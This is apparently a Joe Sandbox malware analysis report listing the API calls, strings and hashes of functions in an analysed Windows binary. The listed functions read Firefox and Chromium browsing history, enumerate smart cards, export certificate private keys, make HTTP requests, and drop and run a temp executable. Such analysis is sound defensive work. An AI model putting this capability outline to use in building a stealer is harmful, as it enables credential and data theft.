Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
API String ID: 2161712720-3700434115
Opcode ID: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
Instruction ID: faa33bef7225eafc2b5cbf98d73cd98fc521e5bf1ac053dd628534faab0246e0
Opcode Fuzzy Hash: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
Instruction Fuzzy Hash: 39E16932B16A828AE710DFA1E844BEE77A1FB49788F444176DE4E57A58DF3CD10AC740

Function 00007FF6AAB4213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

WinHttpOpen.WINHTTP ref: 00007FF6AAB4218D

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

WinHttpCrackUrl.WINHTTP ref: 00007FF6AAB421D8
WinHttpConnect.WINHTTP ref: 00007FF6AAB42213
WinHttpOpenRequest.WINHTTP ref: 00007FF6AAB422A8
WinHttpQueryOption.WINHTTP ref: 00007FF6AAB422E0
WinHttpSetOption.WINHTTP ref: 00007FF6AAB422FC
WinHttpSendRequest.WINHTTP ref: 00007FF6AAB4231D
WinHttpReceiveResponse.WINHTTP ref: 00007FF6AAB42330
WinHttpQueryDataAvailable.WINHTTP ref: 00007FF6AAB42359
WinHttpReadData.WINHTTP ref: 00007FF6AAB42381
WinHttpCloseHandle.WINHTTP ref: 00007FF6AAB424C7
WinHttpCloseHandle.WINHTTP ref: 00007FF6AAB424D0
WinHttpCloseHandle.WINHTTP ref: 00007FF6AAB424E0

Strings

>r!r, xrefs: 00007FF6AAB42265
>r!r, xrefs: 00007FF6AAB42440
=r:r, xrefs: 00007FF6AAB42241

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
String ID: =r:r$>r!r$>r!r
API String ID: 199669925-1865137870
Opcode ID: 9c78ff6a37899225c7b2c52fd49503bd2650756f8c1abc7b340087289b9d972c
Instruction ID: dd894acb1a6713f82b6e0464b9ab1b31127902b13ac757abf37bca9468071e9d
Opcode Fuzzy Hash: 9c78ff6a37899225c7b2c52fd49503bd2650756f8c1abc7b340087289b9d972c
Instruction Fuzzy Hash: 95A1C276A1A382C7EB10DF66A4541AD77A1FB8AB84F544076EE4E83B59DF3CD406CB00

Function 00007FF6AAB4FB4C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4FB7D
lstrcatW.KERNEL32 ref: 00007FF6AAB4FB8A
lstrcpyW.KERNEL32 ref: 00007FF6AAB4FB9B
lstrcatW.KERNEL32 ref: 00007FF6AAB4FBAF
FindFirstFileW.KERNEL32 ref: 00007FF6AAB4FBC3
lstrcatW.KERNEL32 ref: 00007FF6AAB4FBE1
lstrcatW.KERNEL32 ref: 00007FF6AAB4FBF2
FindClose.KERNEL32 ref: 00007FF6AAB4FBFB

Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF76
Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF92
Part of subcall function 00007FF6AAB4FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6AAB4FFBB
Part of subcall function 00007FF6AAB4FF50: PathFileExistsA.SHLWAPI ref: 00007FF6AAB4FFC4
Part of subcall function 00007FF6AAB4FF50: OpenFile.KERNEL32 ref: 00007FF6AAB4FFDD
Part of subcall function 00007FF6AAB4FF50: GetFileSize.KERNEL32 ref: 00007FF6AAB4FFFD
Part of subcall function 00007FF6AAB4FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6AAB50034
Part of subcall function 00007FF6AAB4FF50: MapViewOfFile.KERNEL32 ref: 00007FF6AAB50055
Part of subcall function 00007FF6AAB4FF50: __memcpy.DELAYIMP ref: 00007FF6AAB50067
Part of subcall function 00007FF6AAB4FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6AAB50072
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB5007B
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB50084

Part of subcall function 00007FF6AAB4F294: __memcpy.DELAYIMP ref: 00007FF6AAB4F2B2

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

\places.sqlite, xrefs: 00007FF6AAB4FBE7
APPDATA, xrefs: 00007FF6AAB4FB76
*.default-release, xrefs: 00007FF6AAB4FBA1

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
String ID: *.default-release$APPDATA$\places.sqlite
API String ID: 4154822446-3438982840
Opcode ID: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
Instruction ID: 78de67ad72cbbcac455fe86cfd904b55ac971ef33cedf8054819b8ca91b75fe6
Opcode Fuzzy Hash: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
Instruction Fuzzy Hash: 18316D32A19A47D2EF10DF24E8405E96331FB45794F8051B3EA5F87AA9EF6CD60AC740

Function 00007FF6AAB4B43C Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

SCardGetStatusChangeW.WINSCARD ref: 00007FF6AAB4B553
SCardListCardsW.WINSCARD ref: 00007FF6AAB4B5FB
SCardFreeMemory.WINSCARD ref: 00007FF6AAB4B692
SCardListCardsW.WINSCARD ref: 00007FF6AAB4B7BA
SCardFreeMemory.WINSCARD ref: 00007FF6AAB4B84F

Strings

"_": "", xrefs: 00007FF6AAB4B46A
%02X, xrefs: 00007FF6AAB4B59F

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Card$CardsFreeListMemory$ChangeStatus
String ID: "_": ""$%02X
API String ID: 2879528921-1880646522
Opcode ID: 896a816154fa73125e525209f78e47b2702fc4012d1189665c8c15a996302554
Instruction ID: 6deab46183013b6777b1e9c545b4435fc657a78426df204dc41c120dbcfb0b4d
Opcode Fuzzy Hash: 896a816154fa73125e525209f78e47b2702fc4012d1189665c8c15a996302554
Instruction Fuzzy Hash: F5D12A62F5A603D6EA14EF62A8511F92365AF477C4B4460B3ED1F877AADE3CE5078300

Function 00007FF6AAB436F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32 ref: 00007FF6AAB43744
CryptExportKey.ADVAPI32 ref: 00007FF6AAB4379E

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CryptExport$HeapProcess
String ID:
API String ID: 532797600-0
Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
Instruction ID: 57edb0a47414cef4b7e192b4383022aaa642b82134aef746ad69255749fe43f0
Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
Instruction Fuzzy Hash: 1D21A336A1A642D3EB50DF11F45076A73E0EB85B94F048171DA9E87795DF3CD4028B00

Function 00007FF6AAB4FF50 Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00007FF6AAB4FF76

Part of subcall function 00007FF6AAB42588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6AAB4CD61), ref: 00007FF6AAB42595

lstrlenW.KERNEL32 ref: 00007FF6AAB4FF92
WideCharToMultiByte.KERNEL32 ref: 00007FF6AAB4FFBB
PathFileExistsA.SHLWAPI ref: 00007FF6AAB4FFC4
OpenFile.KERNEL32 ref: 00007FF6AAB4FFDD

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

GetFileSize.KERNEL32 ref: 00007FF6AAB4FFFD

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

CreateFileMappingA.KERNEL32 ref: 00007FF6AAB50034
MapViewOfFile.KERNEL32 ref: 00007FF6AAB50055
__memcpy.DELAYIMP ref: 00007FF6AAB50067
UnmapViewOfFile.KERNEL32 ref: 00007FF6AAB50072
CloseHandle.KERNEL32 ref: 00007FF6AAB5007B
CloseHandle.KERNEL32 ref: 00007FF6AAB50084

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
String ID:
API String ID: 2161876737-0
Opcode ID: ac1ad351885b8ce302dfd172892ec62b602294288ce73c3ce92358ed0e66034f
Instruction ID: 1b90106d038cba55ae202b462bafcea0b13a91130591b488c15d594f1a2039e7
Opcode Fuzzy Hash: ac1ad351885b8ce302dfd172892ec62b602294288ce73c3ce92358ed0e66034f
Instruction Fuzzy Hash: 6331B621A0A643C6E764DB22F8157396291FF8ABD0F084276DD5F87BA5DF3CD4468700

Function 00007FF6AAB41CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FF6AAB41CF7
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6AAB41D04
wsprintfA.USER32 ref: 00007FF6AAB41D1C
CreateFileA.KERNEL32 ref: 00007FF6AAB41D56
WriteFile.KERNEL32 ref: 00007FF6AAB41D88
CloseHandle.KERNEL32 ref: 00007FF6AAB41DA9
ShellExecuteA.SHELL32 ref: 00007FF6AAB41DCE

Strings

open, xrefs: 00007FF6AAB41DC2
%08X.exe, xrefs: 00007FF6AAB41D11

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
String ID: %08X.exe$open
API String ID: 2307396689-1771423410
Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction ID: 4e2b9b948b9b6a7adbbcfb841902c678425cdc4ce76e42a6f59aa22b84e39716
Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction Fuzzy Hash: E5318872A19A86D6E720DF60F8847F96321FB89789F404176DA4E46958CF7CC64EC700

Function 00007FF6AAB4F99C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4FA70
lstrcatW.KERNEL32 ref: 00007FF6AAB4FA80
lstrcatW.KERNEL32 ref: 00007FF6AAB4FA90
lstrcatW.KERNEL32 ref: 00007FF6AAB4FAA4

Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF76
Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF92
Part of subcall function 00007FF6AAB4FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6AAB4FFBB
Part of subcall function 00007FF6AAB4FF50: PathFileExistsA.SHLWAPI ref: 00007FF6AAB4FFC4
Part of subcall function 00007FF6AAB4FF50: OpenFile.KERNEL32 ref: 00007FF6AAB4FFDD
Part of subcall function 00007FF6AAB4FF50: GetFileSize.KERNEL32 ref: 00007FF6AAB4FFFD
Part of subcall function 00007FF6AAB4FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6AAB50034
Part of subcall function 00007FF6AAB4FF50: MapViewOfFile.KERNEL32 ref: 00007FF6AAB50055
Part of subcall function 00007FF6AAB4FF50: __memcpy.DELAYIMP ref: 00007FF6AAB50067
Part of subcall function 00007FF6AAB4FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6AAB50072
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB5007B
Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB50084

Part of subcall function 00007FF6AAB4F294: __memcpy.DELAYIMP ref: 00007FF6AAB4F2B2

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

lstrlenW.KERNEL32 ref: 00007FF6AAB4FB13

Strings

\History, xrefs: 00007FF6AAB4FA96
LOCALAPPDATA, xrefs: 00007FF6AAB4FA69
Default, xrefs: 00007FF6AAB4F9BE

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
String ID: Default$LOCALAPPDATA$\History
API String ID: 3980575106-3555721359
Opcode ID: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
Instruction ID: 39de7f69e226e41b7121943806c817543c4706f2075b2b4e1b589212eeb94b66
Opcode Fuzzy Hash: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
Instruction Fuzzy Hash: 40515322D19F86C3E750DF24E9412A87370FB99B84F45A262DB8D53666EF34E6C9C300

Function 00007FF6AAB4FC84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF6AAB4FC9D
CoCreateInstance.OLE32 ref: 00007FF6AAB4FCC0
CoUninitialize.OLE32 ref: 00007FF6AAB4FDD7

Strings

http, xrefs: 00007FF6AAB4FD82

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: http
API String ID: 948891078-2541227442
Opcode ID: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
Instruction ID: 0a9483150e1cfd09b56b4e06670531b8f7d020af45f16ad38de8067e06accfc8
Opcode Fuzzy Hash: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
Instruction Fuzzy Hash: 2E414C3260AB46D6E7109F75E4903ED23A1FB85B88F044176EA4E8BAA8DF3CD556C700

Function 00007FF6AAB49478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6AAB494BF
WaitForSingleObject.KERNEL32 ref: 00007FF6AAB49505
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6AAB49517
TerminateProcess.KERNEL32 ref: 00007FF6AAB4953A

Part of subcall function 00007FF6AAB4968C: PeekNamedPipe.KERNELBASE ref: 00007FF6AAB496B8

GetExitCodeProcess.KERNEL32 ref: 00007FF6AAB49585
CloseHandle.KERNEL32 ref: 00007FF6AAB49593

Strings

exit, xrefs: 00007FF6AAB49482

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
String ID: exit
API String ID: 1626563136-1626635026
Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
Instruction ID: 09da72074ea2520e3cfbd083344e6fa64c69f324926d41e447d52816eae28b69
Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
Instruction Fuzzy Hash: 5F310E31A0A643CAEF50DF25E4512792761EF86B84F5490B3EA0EC65A9DF2DD847C740

Function 00007FF6AAB41EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6AAB41DE8: RegCreateKeyExA.ADVAPI32 ref: 00007FF6AAB41E35

CoInitializeEx.OLE32 ref: 00007FF6AAB41F1E
VariantInit.OLEAUT32 ref: 00007FF6AAB41F28
CoCreateInstance.OLE32 ref: 00007FF6AAB41F50
SysAllocString.OLEAUT32 ref: 00007FF6AAB41F61
SafeArrayCreateVector.OLEAUT32 ref: 00007FF6AAB41F7D
SafeArrayAccessData.OLEAUT32 ref: 00007FF6AAB41F93
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF6AAB41FAC
SysFreeString.OLEAUT32 ref: 00007FF6AAB42111

Part of subcall function 00007FF6AAB41CBC: GetTempPathA.KERNEL32 ref: 00007FF6AAB41CF7
Part of subcall function 00007FF6AAB41CBC: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6AAB41D04
Part of subcall function 00007FF6AAB41CBC: wsprintfA.USER32 ref: 00007FF6AAB41D1C
Part of subcall function 00007FF6AAB41CBC: CreateFileA.KERNEL32 ref: 00007FF6AAB41D56
Part of subcall function 00007FF6AAB41CBC: WriteFile.KERNEL32 ref: 00007FF6AAB41D88
Part of subcall function 00007FF6AAB41CBC: CloseHandle.KERNEL32 ref: 00007FF6AAB41DA9
Part of subcall function 00007FF6AAB41CBC: ShellExecuteA.SHELL32 ref: 00007FF6AAB41DCE

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
String ID:
API String ID: 1750269033-0
Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction ID: 775260ead6950d42403ff7f64dfbf025543f909085f7cca923e6c50dd65aa03f
Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction Fuzzy Hash: 73614B36B09A06D6EB04DF66D4543AD23B0FB89B88F448172DE0E97B69DF39D50AC340

Function 00007FF6AAB4F11C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

__memcpy.DELAYIMP ref: 00007FF6AAB4F1A3

Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167

Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

last_visit_time, xrefs: 00007FF6AAB4F1FF
url, xrefs: 00007FF6AAB4F1EC
table, xrefs: 00007FF6AAB4F14E
urls, xrefs: 00007FF6AAB4F16C

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 4e01d393290f7b606867a0265dcb02fe101fb4defd41225e9d4834dacb7dced9
Instruction ID: 9a232f3c60e6955ca2f17c452f3a42bcc0d535b8e72200d77adf818f61c4392a
Opcode Fuzzy Hash: 4e01d393290f7b606867a0265dcb02fe101fb4defd41225e9d4834dacb7dced9
Instruction Fuzzy Hash: F731746660A743C2EE60DB26E4405FA6790BB86BC0F444173EE8E97795EE3CD447D700

Function 00007FF6AAB4ECD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

__memcpy.DELAYIMP ref: 00007FF6AAB4ED57

Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167

Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Strings

last_visit_time, xrefs: 00007FF6AAB4EDB3
url, xrefs: 00007FF6AAB4EDA0
table, xrefs: 00007FF6AAB4ED02
urls, xrefs: 00007FF6AAB4ED20

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

